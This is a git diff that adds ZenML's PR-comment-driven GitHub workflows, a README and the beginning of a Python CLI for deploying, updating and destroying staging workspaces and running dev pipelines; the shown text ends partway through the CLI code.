diff --git a/.github/workflows/pr-dev-assistant.yml b/.github/workflows/pr-dev-assistant.yml new file mode 100644 index 00000000000..dcf03619d2f --- /dev/null +++ b/.github/workflows/pr-dev-assistant.yml @@ -0,0 +1,320 @@ +--- +name: PR Dev Assistant +on: + issue_comment: + types: [created] +env: + ZENML_ANALYTICS_OPT_IN: false + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} +jobs: + process-comment: + runs-on: ubuntu-latest + if: ${{ github.event.issue.pull_request && startsWith(github.event.comment.body, '!') }} + outputs: + command: ${{ steps.extract-command.outputs.command }} + command_arg: ${{ steps.extract-command.outputs.command_arg }} + pr_number: ${{ github.event.issue.number }} + branch_name: ${{ steps.get-pr-branch.outputs.branch_slug }} + original_branch: ${{ steps.get-pr-branch.outputs.branch }} + zenml_version: ${{ steps.get-pr-branch.outputs.zenml_version }} + is_authorized: ${{ steps.check-permissions.outputs.is_authorized }} + steps: + - name: Check user permissions + id: check-permissions + run: | + # Check if user is a repository collaborator or organization member + USER="${{ github.event.comment.user.login }}" + + # Check if the user is a repo collaborator (has write access) + IS_COLLABORATOR=$(gh api repos/${{ github.repository }}/collaborators/$USER --silent || echo "false") + if [[ "$IS_COLLABORATOR" != "false" ]]; then + echo "User $USER is a repository collaborator" + echo "is_authorized=true" >> $GITHUB_OUTPUT + exit 0 + fi + + # Check if user is org member + ORG="${{ github.repository_owner }}" + IS_ORG_MEMBER=$(gh api orgs/$ORG/members/$USER --silent || echo "false") + if [[ "$IS_ORG_MEMBER" != "false" ]]; then + echo "User $USER is an organization member" + echo "is_authorized=true" >> $GITHUB_OUTPUT + exit 0 + fi + + # If we get here, user is not authorized + echo "User $USER is not authorized to trigger this workflow" + echo "is_authorized=false" >> $GITHUB_OUTPUT + - name: Check if comment contains command + id: extract-command + if: steps.check-permissions.outputs.is_authorized == 'true' + run: | + COMMENT="${{ github.event.comment.body }}" + + # Extract command and argument + if [[ "$COMMENT" == "!deploy" ]]; then + echo "command=deploy" >> $GITHUB_OUTPUT + echo "command_arg=" >> $GITHUB_OUTPUT + elif [[ "$COMMENT" == "!update" ]]; then + echo "command=update" >> $GITHUB_OUTPUT + echo "command_arg=" >> $GITHUB_OUTPUT + elif [[ "$COMMENT" == "!destroy" ]]; then + echo "command=destroy" >> $GITHUB_OUTPUT + echo "command_arg=" >> $GITHUB_OUTPUT + elif [[ "$COMMENT" == "!status" ]]; then + echo "command=status" >> $GITHUB_OUTPUT + echo "command_arg=" >> $GITHUB_OUTPUT + elif [[ "$COMMENT" == "!run" ]]; then + echo "command=run" >> $GITHUB_OUTPUT + echo "command_arg=" >> $GITHUB_OUTPUT + elif [[ "$COMMENT" =~ ^!run\ (.*)$ ]]; then + PIPELINE_NAME="${BASH_REMATCH[1]}" + echo "command=run" >> $GITHUB_OUTPUT + echo "command_arg=$PIPELINE_NAME" >> $GITHUB_OUTPUT + else + echo "command=none" >> $GITHUB_OUTPUT + echo "command_arg=" >> $GITHUB_OUTPUT + fi + - name: Check if user is unauthorized + if: steps.check-permissions.outputs.is_authorized == 'false' + run: | + echo "User ${{ github.event.comment.user.login }} is not authorized to run this workflow" + exit 1 + - name: Exit if no valid command + if: steps.extract-command.outputs.command == 'none' + run: | + echo "No valid command found in comment" + exit 1 + - name: Checkout code + uses: actions/checkout@v4.2.2 + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip install . + - name: Get PR branch and checkout + id: get-pr-branch + run: | + # Get the PR info to extract the head branch + PR_DATA=$(gh pr view ${{ github.event.issue.number }} --json headRefName --jq .headRefName) + echo "branch=$PR_DATA" >> $GITHUB_OUTPUT + + # Checkout the branch + git checkout $PR_DATA || (echo "Failed to checkout branch $PR_DATA" && exit 1) + + # Use the zen-dev info command to get the slugified branch name and ZenML version + echo "Getting branch info and ZenML version using zen-dev info" + INFO_OUTPUT=$(./zen-dev info) + + # Extract slugified name from output + BRANCH_SLUG=$(echo "$INFO_OUTPUT" | grep "Slugified name:" | cut -d ":" -f 2 | tr -d ' ') + echo "Created Docker-compatible tag: $BRANCH_SLUG" + echo "branch_slug=${BRANCH_SLUG}" >> $GITHUB_OUTPUT + + # Extract ZenML version from output + ZENML_VERSION=$(echo "$INFO_OUTPUT" | grep "ZenML version:" | cut -d ":" -f 2 | tr -d ' ') + echo "Version detected: ${ZENML_VERSION}" + echo "zenml_version=${ZENML_VERSION}" >> $GITHUB_OUTPUT + + # Check if version was found + if [[ -z "$ZENML_VERSION" || "$ZENML_VERSION" == *"Could not determine"* ]]; then + echo "ERROR: ZenML version could not be determined" + echo "This is required for deployment. Please ensure you're using a valid branch." + exit 1 + fi + + # Deploy workspace + deploy-workspace: + needs: process-comment + if: needs.process-comment.outputs.command == 'deploy' + runs-on: ubuntu-latest + steps: + - name: Checkout code + uses: actions/checkout@v4.2.2 + with: + ref: ${{ needs.process-comment.outputs.original_branch }} + - name: Build docker images + uses: google-github-actions/setup-gcloud@v0 + with: + service_account_email: ${{ secrets.GCP_CLOUDBUILD_EMAIL }} + service_account_key: ${{ secrets.GCP_CLOUDBUILD_KEY }} + project_id: ${{ secrets.GCP_CLOUDBUILD_PROJECT }} + - name: Submit build job + run: | + gcloud builds submit \ + --quiet \ + --config=pull_request_cloudbuild.yaml \ + --substitutions=_ZENML_BRANCH_NAME=${{ needs.process-comment.outputs.branch_name }} + - name: Set up Python + uses: actions/setup-python@v5.3.0 + with: + python-version: '3.11' + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip install . + - name: Run zen-dev deploy + env: + CLOUD_STAGING_CLIENT_ID: ${{ secrets.CLOUD_STAGING_CLIENT_ID }} + CLOUD_STAGING_CLIENT_SECRET: ${{ secrets.CLOUD_STAGING_CLIENT_SECRET }} + DEV_ORGANIZATION_ID: ${{ secrets.CLOUD_STAGING_GH_ACTIONS_ORGANIZATION_ID }} + run: | + # Use zen-dev CLI directly without installation + ./zen-dev deploy --workspace ${{ needs.process-comment.outputs.branch_name }} \ + --zenml-version ${{ needs.process-comment.outputs.zenml_version }} \ + --docker-image zenmldocker/zenml-server-dev:${{ needs.process-comment.outputs.branch_name }} + - name: Add result comment + run: | + TENANT_URL="https://staging.cloud.zenml.io/workspaces/${{ needs.process-comment.outputs.branch_name }}/projects" + gh pr comment ${{ needs.process-comment.outputs.pr_number }} --body "✅ Workspace deployed! Access it at: $TENANT_URL" + + # Update workspace + update-workspace: + needs: process-comment + if: needs.process-comment.outputs.command == 'update' + runs-on: ubuntu-latest + steps: + - name: Checkout code + uses: actions/checkout@v4.2.2 + with: + ref: ${{ needs.process-comment.outputs.original_branch }} + - name: Build docker images + uses: google-github-actions/setup-gcloud@v0 + with: + service_account_email: ${{ secrets.GCP_CLOUDBUILD_EMAIL }} + service_account_key: ${{ secrets.GCP_CLOUDBUILD_KEY }} + project_id: ${{ secrets.GCP_CLOUDBUILD_PROJECT }} + - name: Submit build job + run: | + gcloud builds submit \ + --quiet \ + --config=pull_request_cloudbuild.yaml \ + --substitutions=_ZENML_BRANCH_NAME=${{ needs.process-comment.outputs.branch_name }} + - name: Set up Python + uses: actions/setup-python@v5.3.0 + with: + python-version: '3.11' + - name: Run zen-dev update + env: + CLOUD_STAGING_CLIENT_ID: ${{ secrets.CLOUD_STAGING_CLIENT_ID }} + CLOUD_STAGING_CLIENT_SECRET: ${{ secrets.CLOUD_STAGING_CLIENT_SECRET }} + run: | + # Use zen-dev CLI directly without installation + ./zen-dev update --workspace ${{ needs.process-comment.outputs.branch_name }} \ + --zenml-version ${{ needs.process-comment.outputs.zenml_version }} \ + --docker-image zenmldocker/zenml-server-dev:${{ needs.process-comment.outputs.branch_name }} + + - name: Add result comment + run: | + TENANT_URL="https://staging.cloud.zenml.io/workspaces/${{ needs.process-comment.outputs.branch_name }}/projects" + gh pr comment ${{ needs.process-comment.outputs.pr_number }} --body "✅ Workspace updated! Access it at: $TENANT_URL" + + # Destroy workspace + destroy-workspace: + needs: process-comment + if: needs.process-comment.outputs.command == 'destroy' + runs-on: ubuntu-latest + steps: + - name: Checkout code + uses: actions/checkout@v4.2.2 + with: + ref: ${{ needs.process-comment.outputs.original_branch }} + - name: Set up Python + uses: actions/setup-python@v5.3.0 + with: + python-version: '3.11' + - name: Run zen-dev destroy + env: + CLOUD_STAGING_CLIENT_ID: ${{ secrets.CLOUD_STAGING_CLIENT_ID }} + CLOUD_STAGING_CLIENT_SECRET: ${{ secrets.CLOUD_STAGING_CLIENT_SECRET }} + run: | + # Use zen-dev CLI directly without installation + # First get the workspace ID + WORKSPACE_ID=$(./dev/zen-dev status --workspace ${{ needs.process-comment.outputs.branch_name }} --format json | jq -r .id) + ./dev/zen-dev destroy --workspace $WORKSPACE_ID --force + + - name: Add result comment + run: | + gh pr comment ${{ needs.process-comment.outputs.pr_number }} --body "✅ Workspace destroyed." + + # Generate matrix + prepare-pipelines: + needs: process-comment + if: needs.process-comment.outputs.command == 'run' + runs-on: ubuntu-latest + outputs: + matrix: ${{ steps.matrix.outputs.matrix }} + zenml_store_url: ${{ steps.auth.outputs.server_url }} + zenml_store_api_key: ${{ steps.auth.outputs.api_key }} + steps: + - name: Checkout code + uses: actions/checkout@v4.2.2 + with: + ref: ${{ needs.process-comment.outputs.original_branch }} + + - name: Set up Python + uses: actions/setup-python@v5.3.0 + with: + python-version: '3.11' + + - name: Connect to the ZenML Workspace + id: auth + env: + CLOUD_STAGING_CLIENT_ID: ${{ secrets.CLOUD_STAGING_CLIENT_ID }} + CLOUD_STAGING_CLIENT_SECRET: ${{ secrets.CLOUD_STAGING_CLIENT_SECRET }} + run: | + echo "Setting up authentication to ZenML Workspace" + + # Install required packages + pip install requests + + # Use the dev CLI to authenticate and create a service account + WORKSPACE_NAME="${{ needs.process-comment.outputs.branch_name }}" + + # The CLI automatically masks secrets and sets outputs + ./zen-dev gh-action-login + + echo "Successfully connected to ZenML workspace" + + - name: Generate matrix + id: matrix + run: | + # Run the config parser to generate the matrix + FILTER="${{ needs.process-comment.outputs.command_arg }}" + echo "Using filter: '$FILTER'" + + # Get JSON matrix directly from the script + MATRIX=$(python dev/dev_pipelines_config_parser.py --input "$FILTER") + + # Check if any configurations were found + if [[ $MATRIX == *"No matching configurations found"* ]]; then + echo "::error::No matching configurations found for filter: $FILTER" + exit 1 + fi + + # Set the matrix output directly - script outputs JSON + echo "matrix=$MATRIX" >> $GITHUB_OUTPUT + + # Count configurations for reporting + CONFIG_COUNT=$(echo "$MATRIX" | python -c "import json, sys; print(len(json.loads(sys.stdin.read())['include']))") + echo "Found $CONFIG_COUNT configurations to run" + + # Run pipelines using matrix strategy + run-pipelines: + needs: [process-comment, prepare-pipelines] + runs-on: ubuntu-latest + strategy: + matrix: ${{ fromJson(needs.prepare-pipelines.outputs.matrix) }} + fail-fast: false + steps: + - name: Run pipeline using reusable workflow + uses: ./.github/workflows/run-dev-pipeline + with: + zenml_store_url: ${{ needs.prepare-pipelines.outputs.zenml_store_url }} + zenml_store_api_key: ${{ needs.prepare-pipelines.outputs.zenml_store_api_key }} + dev_pipeline: ${{ matrix.pipeline_name }} + branch: ${{ needs.process-comment.outputs.original_branch }} + stack: ${{ matrix.stack }} + run_command: ${{ matrix.command || 'python run.py' }} + kwargs: ${{ matrix.params || '' }} + + \ No newline at end of file diff --git a/.github/workflows/run-dev-pipeline.yml b/.github/workflows/run-dev-pipeline.yml new file mode 100644 index 00000000000..8e405fb4973 --- /dev/null +++ b/.github/workflows/run-dev-pipeline.yml @@ -0,0 +1,97 @@ +--- +name: Run Dev Pipeline +on: + workflow_call: + inputs: + zenml_store_url: + description: ZenML server URL + required: true + type: string + zenml_store_api_key: + description: ZenML server API key + required: true + type: string + dev_pipeline: + description: The name of the dev pipeline to run + required: true + type: string + branch: + description: (Optional) Git branch to checkout + required: false + type: string + default: main + stack: + description: (Optional) ZenML stack to use + required: false + type: string + requirements_file: + description: (Optional) requirements file to install + required: false + type: string + run_command: + description: (Optional) Command to run the pipeline (defaults to "python run.py") + required: false + type: string + default: python run.py + kwargs: + description: (Optional) arguments to pass to the run command + required: false + type: string +jobs: + run-pipeline: + runs-on: ubuntu-latest + env: + ZENML_STORE_URL: ${{ inputs.zenml_store_url }} + ZENML_STORE_API_KEY: ${{ inputs.zenml_store_api_key }} + steps: + - name: Set up Python + uses: actions/setup-python@v5.3.0 + with: + python-version: '3.11' + - name: Checkout code + uses: actions/checkout@v4.2.2 + with: + ref: ${{ inputs.branch }} + - name: Setup target virtual environment + run: | + python -m venv ${{ inputs.dev_pipeline }} + source ${{ inputs.dev_pipeline }}/bin/activate + pip install --upgrade pip uv + echo "Target branch virtual environment created at ${{ inputs.dev_pipeline }}" + - name: Install ZenML + run: | + source ${{ inputs.dev_pipeline }}/bin/activate + uv pip install -e . + zenml --version + - name: Set ZenML stack (if provided) + if: inputs.stack != '' + run: | + source venv/bin/activate + echo "Setting ZenML stack to: ${{ inputs.stack }}" + zenml stack set ${{ inputs.stack }} + - name: Install requirements (if provided) + if: inputs.requirements_file != '' + run: | + source ${{ inputs.dev_pipeline }}/bin/activate + echo "Installing requirements from: ${{ inputs.requirements_file }}" + + # Split multiple requirements files and install each one + IFS=',' read -ra REQ_FILES <<< "${{ inputs.requirements_file }}" + for req_file in "${REQ_FILES[@]}"; do + echo "Installing from: $req_file" + pip install -r "$req_file" + done + - name: Change to pipeline directory + run: | + cd "dev/pipelines/${{ inputs.dev_pipeline }}" + - name: Run pipeline + run: |- + # Prepare the run command + RUN_CMD="${{ inputs.run_command }}" + + # Add kwargs if provided + if [[ -n "${{ inputs.kwargs }}" ]]; then + RUN_CMD="${RUN_CMD} ${{ inputs.kwargs }}" + fi + echo "Running command: ${RUN_CMD}" + eval ${RUN_CMD} diff --git a/dev/README.md b/dev/README.md new file mode 100644 index 00000000000..b669189796f --- /dev/null +++ b/dev/README.md @@ -0,0 +1,231 @@ +# ZenML Developer Tools + +A collection of developer tools for managing ZenML workspaces and running pipelines during development, including a CLI and GitHub workflow integration. + +## Authentication + +The CLI tool requires authentication to access the ZenML Cloud API. You have two options: + +```bash +# Option 1: Using client credentials (for CI/CD) +export CLOUD_STAGING_CLIENT_ID="your-client-id" +export CLOUD_STAGING_CLIENT_SECRET="your-client-secret" + +# Option 2: Using ZenML's authentication (for local development) +# First login with: zenml login --pro-api-url https://staging.cloudapi.zenml.io +# Then use zen-dev commands which will use your existing ZenML auth +``` + +## Workspace Management Commands + +### Build Docker images + +For all the commands below, you can set `--repo` through an environment variable called `DEV_DOCKER_REPO`. + +```bash +# Build a ZenML image +./zen-dev build + +# Build a ZenML server image +./zen-dev build --server + +# Build and push the server image +./zen-dev build --server --push + +# Build with a custom tag (tag defaults to the sluggified branch name) +./zen-dev build --repo zenmldocker --tag v1.0 +``` + +### Deploy a workspace + +For all the commands below, you can set `--organization` through an environment variable called `DEV_ORGANIZATION_ID`. + +```bash +# Create a new workspace with the latest ZenML version +./zen-dev deploy --organization 0000000-0000-0000-000000 + +# Create a new workspace with a custom workspace name (workspace defaults to the sluggied branch name) +./zen-dev deploy --workspace custom-name + +# Specify custom Docker image and Helm chart version +./zen-dev deploy --zenml-version 0.81.0 --docker-image zenmldocker/zenml-server:custom-tag --helm-version 0.36.0 +``` + +### Update a workspace + +```bash +# Update the workspace with the default name (slugified branch name) +./zen-dev update --docker-image some/new:image + +# Update an existing workspace with a new ZenML version +./zen-dev update --workspace my-workspace --zenml-version 0.82.0 + +# Update with a custom Docker image +./zen-dev update --workspace my-workspace --zenml-version 0.82.0 --docker-image zenmldocker/zenml-server:custom-tag +``` + +### Get environment information + +```bash +# Display current git branch, slugified name, and ZenML version +./zen-dev info +``` + +### GitHub Actions authentication + +```bash +# For GitHub Actions workflows only +# Outputs values in GitHub Actions output format +./zen-dev gh-action-login +``` + +### Destroy a workspace + +```bash +# Destroy a workspace (with confirmation prompt) +./zen-dev destroy --workspace my-workspace + +# Force destruction without confirmation +./zen-dev destroy --workspace my-workspace --force +``` + +## Dev Pipelines + +The dev pipelines system allows you to run multiple pipelines with different configurations in a ZenML workspace. + +### Pipeline Configuration + +Create or modify the configuration in `dev/dev_pipelines_config.yaml`. The configuration format allows you to define pipelines with multiple stack and parameter combinations: + +```yaml +pipeline_name: + # Optional command to run (defaults to "python run.py") + command: "python custom_script.py" + + # Define stacks with optional requirements files + stacks: + default: null # null means no specific requirements + aws: requirements_aws.txt # path to requirements file + gcp: requirements_gcp.txt + + # Define parameter sets + params: + default: # default parameter set + batch_size: 32 + epochs: 10 + small: # alternative parameter set + batch_size: 16 + epochs: 5 + +another_pipeline: + stacks: + default: + params: + config_a: + config_file: "config_a.yaml" + config_b: + config_file: "config_b.yaml" +``` + +Each pipeline can have: +- An optional `command` to execute (defaults to `python run.py`) +- Multiple `stacks` with optional requirements files +- Multiple parameter sets under `params` + +For each pipeline, the system will generate all valid combinations of stack and parameter sets, which can be run individually or as a group. + + +### GitHub PR Comment Commands + +You can trigger pipelines directly from PR comments using the following commands: + +``` +# Run all pipelines with all configurations +!run + +# Run a specific pipeline with all its configurations +!run pipeline_name + +# Run a specific pipeline with a specific stack +!run pipeline_name:aws + +# Run a specific pipeline with a specific stack and parameter set +!run pipeline_name:aws::small +``` + +Other available commands: +``` +# Deploy a workspace for the current PR branch +!deploy + +# Update the workspace for the current PR branch +!update + +# Destroy the workspace for the current PR branch +!destroy + +# Get the status of the workspace for the current PR branch +!status +``` + +### Adding Dev Pipelines + +To add a new dev pipeline: + +1. Create a directory in `dev/pipelines/your_pipeline_name/` +2. Add your pipeline code and a file as the entry point (defaults to run.py) +3. Add the pipeline configuration to `dev/dev_pipelines_config.yaml` +4. Commit and push your changes +5. Trigger the pipeline with a PR comment: `!run your_pipeline_name` + +## Workflow Implementation Details + +The system uses several components: + +1. `./zen-dev`: CLI tool for workspace management and authentication +2. `dev/dev_pipelines_config_parser.py`: Generates pipeline configurations +3. `.github/workflows/pr-dev-assistant.yml`: Processes PR comments and triggers pipelines +4. `.github/workflows/run-dev-pipeline.yml`: Reusable workflow for running a pipeline + +When a user comments on a PR with a command like `!run`, the system: +1. Authenticates with the workspace +2. Creates/Reuses a service account for running pipelines +3. Parses the command to determine which pipelines to run +4. Generates a matrix of configurations +5. Runs each configuration as a separate job + +## Examples + +### Complete Development Workflow + +1. **Create a PR with your changes** + +2. **Deploy a workspace for your branch**: + Comment on the PR: + ``` + !deploy + ``` + +3. **Update the workspace after making changes**: + Comment on the PR: + ``` + !update + ``` + +4. **Run all pipelines to verify functionality**: + Comment on the PR: + ``` + !run + ``` + +5. **Run a specific pipeline configuration**: + Comment on the PR: + ``` + !run my_pipeline:aws::small + ``` + +6. **Clean up when done**: + Comment on the PR: + ``` + !destroy + ``` \ No newline at end of file diff --git a/dev/__init__.py b/dev/__init__.py new file mode 100644 index 00000000000..d6f915f2377 --- /dev/null +++ b/dev/__init__.py @@ -0,0 +1,13 @@ +# Copyright (c) ZenML GmbH 2025. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at: +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express +# or implied. See the License for the specific language governing +# permissions and limitations under the License. \ No newline at end of file diff --git a/dev/cli.py b/dev/cli.py new file mode 100644 index 00000000000..ef66e166b20 --- /dev/null +++ b/dev/cli.py @@ -0,0 +1,1128 @@ +# Copyright (c) ZenML GmbH 2025. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at: +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express +# or implied. See the License for the specific language governing +# permissions and limitations under the License. +"""ZenML Dev CLI for managing workspaces and running dev pipelines.""" + +import json +import os +import re +import subprocess +import sys +import time +from typing import Any, Dict, Optional, Tuple +from uuid import UUID +import logging +import click +import requests + +try: + import docker + from docker.errors import APIError, BuildError + DOCKER_AVAILABLE = True +except ImportError: + DOCKER_AVAILABLE = False + BuildError = Exception + APIError = Exception + +from zenml.login.pro.client import AuthorizationException, ZenMLProClient + +# Constants for environment variables +ZENML_API_URL_ENV = "ZENML_STORE_URL" +ZENML_API_KEY_ENV = "ZENML_STORE_API_KEY" +ZENML_CONFIG_FILE = os.path.expanduser("~/.zenml/dev_config.json") + + +BASE_STAGING_URL = "https://staging.cloudapi.zenml.io" + +def _disect_docker_image_parts(docker_image: str) -> Tuple[str, str]: + """Get the image repository and tag from a Docker image. + + Args: + docker_image: The Docker image to disect. + + Returns: + A tuple of (image_repository, image_tag). + """ + docker_image_parts = docker_image.split(":") + if len(docker_image_parts) == 1: + image_repository = docker_image_parts[0] + image_tag = "latest" + else: + image_repository = docker_image_parts[0] + image_tag = docker_image_parts[1] + return image_repository, image_tag + + +def _get_headers(token: str) -> Dict[str, str]: + """Get the headers for the staging API. + + Args: + token: The access token for the staging API. + + Returns: + A dictionary of headers for the staging API. + """ + return {"Authorization": f"Bearer {token}", "accept": "application/json"} + + +def _build_configuration( + zenml_version: Optional[str], + docker_image: Optional[str] = None, + helm_chart_version: Optional[str] = None, +) -> Dict[str, Any]: + """Build the configuration for the workspace. + + Args: + zenml_version: The ZenML version to use for the workspace. + docker_image: The Docker image to use for the workspace. + helm_chart_version: The Helm chart version to use for the workspace. + + Returns: + The configuration dictionary for the workspace. + """ + configuration: Dict[str, Any] = {} + + if zenml_version: + configuration["version"] = zenml_version + + if any([docker_image, helm_chart_version]): + configuration["admin"] = {} + + if docker_image is not None: + image_repository, image_tag = _disect_docker_image_parts(docker_image) + configuration["admin"] = configuration.get("admin", {}) + configuration["admin"]["image_repository"] = image_repository + configuration["admin"]["image_tag"] = image_tag + + if helm_chart_version is not None: + configuration["admin"] = configuration.get("admin", {}) + configuration["admin"]["helm_chart_version"] = helm_chart_version + + return configuration + + +def get_current_git_branch() -> Optional[str]: + """Get the current git branch name. + + Returns: + The current git branch name, or None if it cannot be determined. + """ + try: + result = subprocess.run( + ["git", "rev-parse", "--abbrev-ref", "HEAD"], + stdout=subprocess.PIPE, + stderr=subprocess.PIPE, + text=True, + check=True + ) + branch = result.stdout.strip() + + # Handle detached HEAD state + if branch == "HEAD": + return None + + return branch + except (subprocess.SubprocessError, FileNotFoundError): + return None + + +def slugify_branch_name(branch_name: str) -> str: + """Convert a branch name to a Docker-compatible tag. + + Implements the same slugification logic as the GitHub workflow: + 1. Convert to lowercase + 2. Replace invalid chars with dashes + 3. Remove leading non-alphanumeric chars + 4. Replace multiple consecutive dashes with a single dash + 5. Remove trailing dashes + 6. Limit to 128 chars max + + Args: + branch_name: The branch name to slugify. + + Returns: + A Docker-compatible tag derived from the branch name. + """ + # Convert to lowercase + slug = branch_name.lower() + + # Replace invalid chars with dashes (only allow a-z, 0-9, ., _, -) + slug = re.sub(r"[^a-z0-9_\.\-]", "-", slug) + + # Remove leading non-alphanumeric chars + slug = re.sub(r"^[^a-z0-9]*", "", slug) + + # Replace multiple consecutive dashes with a single dash + slug = re.sub(r"-+", "-", slug) + + # Remove trailing dashes + slug = re.sub(r"-$", "", slug) + + # Limit to 128 chars max + slug = slug[:128] + + # If we end up with an empty string, use "dev" as fallback + if not slug: + slug = "dev" + + return slug + + +def get_zenml_version() -> Optional[str]: + """Get the ZenML version from the VERSION file. + + Returns: + The ZenML version as a string, or None if the VERSION file cannot be found or read. + """ + # Try different possible locations for the VERSION file + version_paths = [ + "src/zenml/VERSION", # When in the zenml repo root + "../src/zenml/VERSION", # When in the dev directory + "../../src/zenml/VERSION", # When in a subdirectory of dev + ] + + for path in version_paths: + if os.path.exists(path): + try: + with open(path, "r") as f: + # Read and remove any whitespace + return f.read().strip() + except (IOError, OSError): + pass + + return None + + +def get_default_workspace_name() -> str: + """Get a default workspace name based on the current git branch. + + Returns: + A slugified version of the current git branch name, or "dev" if the branch + cannot be determined. + """ + branch = get_current_git_branch() + if branch: + return slugify_branch_name(branch) + else: + return "dev" + + +def get_token(client_id: str, client_secret: str) -> str: + """Get an access token for the staging API. + + Args: + client_id: The client ID for authentication with the API. + client_secret: The client secret for authentication with the API. + + Returns: + A valid access token as a string. + + Raises: + RuntimeError: If the API request fails for any reason. + """ + url = f"{BASE_STAGING_URL}/auth/login" + data = { + "grant_type": "", + "client_id": client_id, + "client_secret": client_secret, + } + response = requests.post(url, data=data) + try: + response.raise_for_status() + except requests.exceptions.HTTPError: + raise RuntimeError( + f"Request failed with response content: {response.text}" + ) + + return response.json()["access_token"] + + +def get_workspace(token: str, workspace_name_or_id: str) -> Dict[str, Any]: + """Get a workspace by name or ID. + + Args: + token: The access token for authentication with the API. + workspace_name_or_id: The name or ID of the workspace to retrieve. + + Returns: + The workspace information as a dictionary. + + Raises: + RuntimeError: If the API request fails for any reason. + """ + url = f"{BASE_STAGING_URL}/workspaces/{workspace_name_or_id}" + + response = requests.get(url, headers=_get_headers(token)) + try: + response.raise_for_status() + except requests.exceptions.HTTPError: + raise RuntimeError( + f"Request failed with response content: {response.text}" + ) + + return response.json() + + +def create_workspace( + token: str, + workspace_name: str, + organization_id: str, + configuration: Dict[str, Any], +) -> Dict[str, Any]: + """Create a new ZenML workspace. + + Args: + token: The access token for authentication with the API. + workspace_name: The name for the new workspace. + organization_id: The ID of the organization to create the workspace in. + configuration: The configuration settings for the workspace. + + Returns: + The created workspace information as a dictionary. + + Raises: + RuntimeError: If the API request fails for any reason. + """ + url = f"{BASE_STAGING_URL}/workspaces" + + data = { + "name": workspace_name, + "organization_id": organization_id, + "zenml_service": { + "configuration": configuration, + }, + } + response = requests.post(url, headers=_get_headers(token), json=data) + + try: + response.raise_for_status() + except requests.exceptions.HTTPError: + raise RuntimeError( + f"Request failed with response content: {response.text}" + ) + + return response.json() + + +def update_workspace( + token: str, + workspace_name_or_id: str, + configuration: Dict[str, Any], +) -> None: + """Update an existing ZenML workspace. + + Args: + token: The access token for authentication with the API. + workspace_name_or_id: The name or ID of the workspace to update. + configuration: The new configuration settings for the workspace. + + Raises: + RuntimeError: If the API request fails for any reason. + """ + url = f"{BASE_STAGING_URL}/workspaces/{workspace_name_or_id}" + + data = { + "zenml_service": {"configuration": configuration}, + "desired_state": "available", + } + + response = requests.patch( + url, json=data, headers=_get_headers(token), params={"force": True} + ) + try: + response.raise_for_status() + except requests.exceptions.HTTPError: + raise RuntimeError( + f"Request failed with response content: {response.text}" + ) + + +def destroy_workspace(token: str, workspace_id: UUID) -> None: + """Destroy (delete) a ZenML workspace. + + Args: + token: The access token for authentication with the API. + workspace_id: The UUID of the workspace to destroy. + + Raises: + RuntimeError: If the API request fails for any reason. + """ + url = f"{BASE_STAGING_URL}/workspaces/{workspace_id}" + + response = requests.delete(url, headers=_get_headers(token)) + try: + response.raise_for_status() + except requests.exceptions.HTTPError: + raise RuntimeError( + f"Request failed with response content: {response.text}" + ) + + +def wait_for_availability(token: str, workspace_name_or_id: str, timeout: int = 600) -> None: + """Wait for a workspace to become available. + + Polls the workspace status until it transitions from 'pending' to 'available' + or until the timeout is reached. + + Args: + token: The access token for authentication with the API. + workspace_name_or_id: The name or ID of the workspace to wait for. + timeout: Maximum time to wait in seconds (default: 600). + + Raises: + RuntimeError: If the workspace fails to become available or if the timeout is reached. + """ + sleep_period = 10 + deadline = time.time() + timeout + workspace = get_workspace(token, workspace_name_or_id) + + click.echo("Waiting for workspace to become available...") + + while workspace["status"] == "pending": + click.echo(f"Current status: {workspace['status']}. Waiting...") + + if time.time() > deadline: + raise RuntimeError( + "Timed out! The workspace could be stuck in a `pending` state." + ) + + time.sleep(sleep_period) + workspace = get_workspace(token, workspace_name_or_id) + + if workspace["status"] != "available": + raise RuntimeError(f"Workspace creation failed with status: {workspace['status']}") + + click.echo(f"Workspace is available! Status: {workspace['status']}") + + +def get_auth_token() -> str: + """Get authentication token from environment variables or ZenML Pro Client. + + Checks for authentication credentials in environment variables and + if not found, tries to use the ZenML Pro Client's existing authentication. + + Returns: + A valid authentication token. + + Raises: + ValueError: If required authentication credentials are not found. + """ + client_id = os.environ.get("CLOUD_STAGING_CLIENT_ID") + client_secret = os.environ.get("CLOUD_STAGING_CLIENT_SECRET") + + if client_id and client_secret: + return get_token(client_id, client_secret) + + # Try to use ZenML Pro Client if credentials not in environment variables + try: + + click.echo("Credentials not found in environment variables. Trying to use existing ZenML authentication...") + client = ZenMLProClient(url=BASE_STAGING_URL) + api_token = client.api_token + + if api_token: + click.echo("Using existing ZenML authentication") + return api_token + else: + raise ValueError("Could not get authentication token from ZenML Pro Client") + + except AuthorizationException: + raise ValueError( + "You are not logged in to ZenML. Please either login with 'zenml login' " + "or set CLOUD_STAGING_CLIENT_ID and CLOUD_STAGING_CLIENT_SECRET environment variables." + ) + except Exception as e: + raise ValueError( + f"Failed to authenticate: {str(e)}. Please either login with 'zenml login' " + "or set CLOUD_STAGING_CLIENT_ID and CLOUD_STAGING_CLIENT_SECRET environment variables." + ) + + +@click.group() +def cli(): + """ZenML Dev CLI for managing workspaces and running pipelines.""" + pass + + +@cli.command("deploy") +@click.option( + "--workspace", + help="Name of the workspace to create (defaults to slugified git branch name)", + default=None +) +@click.option( + "--organization", + help="Organization ID", + envvar="DEV_ORGANIZATION_ID" +) +@click.option( + "--zenml-version", + help="ZenML version to use (defaults to value from VERSION file)", + default=None +) +@click.option( + "--helm-version", + help="Helm chart version to use" +) +@click.option( + "--docker-image", + help="Docker image to use (format: repository:tag)" +) +def deploy( + workspace: Optional[str], + organization: str, + zenml_version: Optional[str], + 